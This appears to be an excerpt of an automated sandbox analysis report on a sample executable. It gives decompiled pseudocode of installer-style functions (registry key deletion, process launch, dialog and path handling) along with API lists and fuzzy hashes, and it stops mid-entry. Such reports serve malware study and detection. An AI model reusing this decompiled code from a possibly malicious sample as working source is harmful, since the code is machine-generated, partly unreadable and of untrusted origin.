					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405F87(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405F87(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405F87(_t41, _t47, 0x42a870, 0x42a870, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a870), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42ebd8, _a4, 0x42a870);
			}



















              0x00404853
              0x00404858
              0x00404860
              0x00404861
              0x0040486e
              0x00404876
              0x00404877
              0x00404879
              0x0040487b
              0x0040487d
              0x00404880
              0x00404880
              0x00404887
              0x0040488d
              0x0040488d
              0x00404894
              0x0040489b
              0x0040489e
              0x004048a1
              0x004048a1
              0x004048a5
              0x004048b5
              0x004048b7
              0x004048ba
              0x00404863
              0x00404863
              0x0040486a
              0x0040486a
              0x004048c2
              0x004048cd
              0x004048e3
              0x004048f3
              0x0040490f

              APIs
              • lstrlenA.KERNEL32(0042A870,0042A870,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404768,000000DF,00000000,00000400,?), ref: 004048EB
              • wsprintfA.USER32 ref: 004048F3
              • SetDlgItemTextA.USER32 ref: 00404906
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: ItemTextlstrlenwsprintf
              • String ID: %u.%u%s%s
              • API String ID: 3540041739-3551169577
              • Opcode ID: fc360b60deb29158253d5225dc841659dab03716f0da90b14001ba2338fc6a71
              • Instruction ID: 46e1028d5dd9cf3fa3a12b124fa319e283dc00677a7b855ac62dacd231200cde
              • Opcode Fuzzy Hash: fc360b60deb29158253d5225dc841659dab03716f0da90b14001ba2338fc6a71
              • Instruction Fuzzy Hash: 8D11E477A041282BEB0075699C41EBF3298DB82374F24463BFE65F21D1E979CC1246E9
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401C04 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
              Download Yara Rule
              C-Code - Quality: 59%
              			E00401C04(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402A9F(3);
				 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402A9F(4);
				 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402AC1(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402AC1(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402AC1();
					_t32 = E00402AC1();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402A9F();
					 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
					_t41 = E00402A9F(2);
					 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E00405EC3();
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















              0x00401c04
              0x00401c06
              0x00401c0d
              0x00401c10
              0x00401c13
              0x00401c1d
              0x00401c21
              0x00401c24
              0x00401c2d
              0x00401c2d
              0x00401c30
              0x00401c34
              0x00401c3d
              0x00401c3d
              0x00401c40
              0x00401c44
              0x00401c46
              0x00401c9b
              0x00401c9d
              0x00401ca6
              0x00401cae
              0x00401cb1
              0x00401cb1
              0x00401cba
              0x00000000
              0x00401c48
              0x00401c4f
              0x00401c51
              0x00401c54
              0x00401c5a
              0x00401c61
              0x00401c64
              0x00401c8c
              0x00401cc0
              0x00401cc0
              0x00401c66
              0x00401c74
              0x00401c7c
              0x00401c7f
              0x00401c7f
              0x00401c64
              0x00401cc3
              0x00401cc6
              0x00401ccc
              0x004028f9
              0x004028f9
              0x00402954
              0x00402960

              APIs
              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
              • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: MessageSend$Timeout
              • String ID: !
              • API String ID: 1777923405-2657877971
              • Opcode ID: 8c877d5979cff4b3ce41adc99c27d6fc77d82e5cc3f5856b61787971cd0c7bbc
              • Instruction ID: bdc01a124477b6dd133b62af0939e03034df0dda3ad70936a50ebcebbcd9d6cc
              • Opcode Fuzzy Hash: 8c877d5979cff4b3ce41adc99c27d6fc77d82e5cc3f5856b61787971cd0c7bbc
              • Instruction Fuzzy Hash: 9F218F71A44209BEEB15DFA5D946AED7BB0EB84304F14803EF505F61D1DA7889408F28
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004058FD Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004058FD(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}




              0x004058fe
              0x00405915
              0x0040591d
              0x0040591d
              0x00405925

              APIs
              • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031DE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00405903
              • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031DE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 0040590C
              • lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 0040591D
              Strings
              • C:\Users\user\AppData\Local\Temp\, xrefs: 004058FD
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: CharPrevlstrcatlstrlen
              • String ID: C:\Users\user\AppData\Local\Temp\
              • API String ID: 2659869361-823278215
              • Opcode ID: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
              • Instruction ID: 647ad7e742d71b16062aa4f61d1124f0b3f0fcedfae467302285f0529c6cb9e2
              • Opcode Fuzzy Hash: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
              • Instruction Fuzzy Hash: 46D0C9A2606A317AD21227159C09EDB6A4CCF57755B054076F640B61A1CA7C4D428BFE
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402BB4 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
              Download Yara Rule
              C-Code - Quality: 84%
              			E00402BB4(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				char _v272;
				void* _t19;
				signed int _t26;
				intOrPtr* _t28;
				signed int _t33;
				signed int _t34;
				signed int _t35;

				_t34 = _a12;
				_t35 = _t34 & 0x00000300;
				_t33 = _t34 & 0x00000001;
				_t19 = E00405DEB(__eflags, _a4, _a8, _t35 | 0x00000008,  &_v8);
				if(_t19 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							RegCloseKey(_v8);
							return 1;
						}
						_t26 = E00402BB4(__eflags, _v8,  &_v272, _a12);
						__eflags = _t26;
						if(_t26 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t28 = E004062FD(3);
					if(_t28 == 0) {
						return RegDeleteKeyA(_a4, _a8);
					}
					return  *_t28(_a4, _a8, _t35, 0);
				}
				return _t19;
			}











              0x00402bbf
              0x00402bc8
              0x00402bd1
              0x00402bdd
              0x00402be4
              0x00402c08
              0x00402bee
              0x00402bf0
              0x00402c43
              0x00000000
              0x00402c4b
              0x00402bff
              0x00402c04
              0x00402c06
              0x00000000
              0x00000000
              0x00402c06
              0x00402c22
              0x00402c2a
              0x00402c31
              0x00000000
              0x00402c54
              0x00000000
              0x00402c3c
              0x00402c5e

              APIs
              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C19
              • RegCloseKey.ADVAPI32(?), ref: 00402C22
              • RegCloseKey.ADVAPI32(?), ref: 00402C43
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: Close$Enum
              • String ID:
              • API String ID: 464197530-0
              • Opcode ID: 24478c4bf15825225cc5c8a9b60ec975c192d416f9cfe0da761514a225b2f336
              • Instruction ID: b62f4967d327be975f6bbb281b4945b449d6b6e398a7fc8ef6fb9c274ae0afe8
              • Opcode Fuzzy Hash: 24478c4bf15825225cc5c8a9b60ec975c192d416f9cfe0da761514a225b2f336
              • Instruction Fuzzy Hash: 9A118832500109BBEF01AF91CF09B9E3B79EF08341F104036BA05B50E0E7B4EE52AB68
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405996 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00405996(CHAR* _a4) {
				CHAR* _t5;
				char* _t7;
				CHAR* _t9;
				char _t10;
				CHAR* _t11;
				void* _t13;

				_t11 = _a4;
				_t9 = CharNextA(_t11);
				_t5 = CharNextA(_t9);
				_t10 =  *_t11;
				if(_t10 == 0 ||  *_t9 != 0x3a || _t9[1] != 0x5c) {
					if(_t10 != 0x5c || _t11[1] != _t10) {
						L10:
						return 0;
					} else {
						_t13 = 2;
						while(1) {
							_t13 = _t13 - 1;
							_t7 = E00405928(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 1;
							if(_t13 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextA(_t5);
				}
			}









              0x0040599f
              0x004059a6
              0x004059a9
              0x004059ab
              0x004059af
              0x004059c4
              0x004059e3
              0x00000000
              0x004059cb
              0x004059cd
              0x004059ce
              0x004059d1
              0x004059d2
              0x004059da
              0x00000000
              0x00000000
              0x004059dc
              0x004059df
              0x00000000
              0x00000000
              0x00000000
              0x004059df
              0x00000000
              0x004059ce
              0x004059bc
              0x00000000
              0x004059bd

              APIs
              • CharNextA.USER32(?,?,C:\,?,00405A02,C:\,C:\,766DFA90,?,C:\Users\user\AppData\Local\Temp\,0040574D,?,766DFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059A4
              • CharNextA.USER32(00000000), ref: 004059A9
              • CharNextA.USER32(00000000), ref: 004059BD
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: CharNext
              • String ID: C:\
              • API String ID: 3213498283-3404278061
              • Opcode ID: 6f1ffd314258f60c9d8d37a97cd5dc7cb97b0114338afd6930da08174d9d3dc4
              • Instruction ID: 692bca14cad493fa5f8fffeffcf9af39aa377604f3823295436d19c4138fc52d
              • Opcode Fuzzy Hash: 6f1ffd314258f60c9d8d37a97cd5dc7cb97b0114338afd6930da08174d9d3dc4
              • Instruction Fuzzy Hash: CDF0C2E1918F50ABFB3252245C41B6B5F9CCB56374F04047BE240672C2C27858408B9A
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402CE4 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00402CE4(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x421428; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42f410;
						if(_t2 >  *0x42f410) {
							_t3 = CreateDialogParamA( *0x42f400, 0x6f, 0, E00402C61, 0);
							 *0x421428 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406339(0);
					}
				} else {
					_t6 =  *0x421428; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x421428 = 0;
					return _t6;
				}
			}






              0x00402ceb
              0x00402d05
              0x00402d0b
              0x00402d15
              0x00402d1b
              0x00402d21
              0x00402d32
              0x00402d3b
              0x00000000
              0x00402d40
              0x00402d47
              0x00402d0d
              0x00402d14
              0x00402d14
              0x00402ced
              0x00402ced
              0x00402cf4
              0x00402cf7
              0x00402cf7
              0x00402cfd
              0x00402d04
              0x00402d04

              APIs
              • DestroyWindow.USER32(00000000,00000000,00402EC4,00000001), ref: 00402CF7
              • GetTickCount.KERNEL32 ref: 00402D15
              • CreateDialogParamA.USER32(0000006F,00000000,00402C61,00000000), ref: 00402D32
              • ShowWindow.USER32(00000000,00000005), ref: 00402D40
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: Window$CountCreateDestroyDialogParamShowTick
              • String ID:
              • API String ID: 2102729457-0
              • Opcode ID: 2469aab9b0bab78131693435c259bb338fdfc1179cff7f610c16a2f3c60769c5
              • Instruction ID: 5343e4f3fd542578671bd54a8d6f819db7b5394acccd132b40ed42660498aa91
              • Opcode Fuzzy Hash: 2469aab9b0bab78131693435c259bb338fdfc1179cff7f610c16a2f3c60769c5
              • Instruction Fuzzy Hash: 01F05430601521EBC7207F24FE8CA8F7A64BB08B11791047AF445B21F4DBB448C28B9C
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405000 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
              Download Yara Rule
              C-Code - Quality: 89%
              			E00405000(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42a85c != _t16) {
							_push(_t16);
							_push(6);
							 *0x42a85c = _t16;
							E004049D7();
						}
						L11:
						return CallWindowProcA( *0x42a864, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404957(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404072(0x413);
				return 0;
			}





              0x00405004
              0x0040500e
              0x0040502a
              0x0040504c
              0x0040504f
              0x00405055
              0x0040505f
              0x00405060
              0x00405062
              0x00405068
              0x00405068
              0x00405072
              0x00000000
              0x00405080
              0x00405037
              0x0040506f
              0x0040506f
              0x00000000
              0x0040506f
              0x00405043
              0x00405045
              0x00000000
              0x00405045
              0x00405014
              0x00000000
              0x00000000
              0x0040501b
              0x00000000

              APIs
              • IsWindowVisible.USER32 ref: 0040502F
              • CallWindowProcA.USER32 ref: 00405080
                • Part of subcall function 00404072: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00404084
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: Window$CallMessageProcSendVisible
              • String ID:
              • API String ID: 3748168415-3916222277
              • Opcode ID: 0b5703a8dab1bd1bd7dd9e2c337de487c6e053b4983eba3ecfb903a9c205ce24
              • Instruction ID: 2f0027df7ddfe28b71d6e39f600ecebaf2ba5c74aec8f2e947ae9809186c917a
              • Opcode Fuzzy Hash: 0b5703a8dab1bd1bd7dd9e2c337de487c6e053b4983eba3ecfb903a9c205ce24
              • Instruction Fuzzy Hash: 48017171500609ABDF205F51DD80E6F3B65EB84754F14403BFA01751D2C77A8CA29F9A
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405604 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00405604(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42c078->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c078,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





              0x0040560d
              0x0040562d
              0x00405635
              0x0040563a
              0x00000000
              0x00405640
              0x00405644

              APIs
              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C078,Error launching installer), ref: 0040562D
              • CloseHandle.KERNEL32(?), ref: 0040563A
              Strings
              • Error launching installer, xrefs: 00405617
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: CloseCreateHandleProcess
              • String ID: Error launching installer
              • API String ID: 3712363035-66219284
              • Opcode ID: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
              • Instruction ID: a14d50d96640d218925096829ca07d1800dc2b789f456133151d87fd2ad2a836
              • Opcode Fuzzy Hash: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
              • Instruction Fuzzy Hash: 9EE046F0640209BFEB109FA0ED49F7F7AACEB00704F404921BD00F2290E67499088A7C
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00403720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00403720() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x429834; // 0x0
				_t3 = E00403705(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x429834 =  *0x429834 & 0x00000000;
				return _t3;
			}







              0x00403721
              0x00403729
              0x00403730
              0x00403733
              0x00403733
              0x00403735
              0x0040373a
              0x00403741
              0x00403747
              0x0040374b
              0x0040374c
              0x00403754

              APIs
              • FreeLibrary.KERNEL32(?,766DFA90,00000000,C:\Users\user\AppData\Local\Temp\,004036F8,00403512,?,?,00000006,00000008,0000000A), ref: 0040373A
              • GlobalFree.KERNEL32 ref: 00403741
              Strings
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403720
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: Free$GlobalLibrary
              • String ID: C:\Users\user\AppData\Local\Temp\
              • API String ID: 1100898210-823278215
              • Opcode ID: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
              • Instruction ID: 7d8ce370987dd57b7bf148727d206b09ac62311aee63c146eb442539f55f5a8e
              • Opcode Fuzzy Hash: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
              • Instruction Fuzzy Hash: 39E0C27391212097C7313F54EE0871ABBA86F46B22F0A403AE8407B26487745C428BCC
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405944 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00405944(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





              0x00405945
              0x0040594f
              0x00405951
              0x00405958
              0x00405960
              0x00000000
              0x00000000
              0x00000000
              0x00405960
              0x00405962
              0x00405967

              APIs
              • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402DB4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\P196hUN2fw.exe,C:\Users\user\Desktop\P196hUN2fw.exe,80000000,00000003), ref: 0040594A
              • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DB4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\P196hUN2fw.exe,C:\Users\user\Desktop\P196hUN2fw.exe,80000000,00000003), ref: 00405958
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
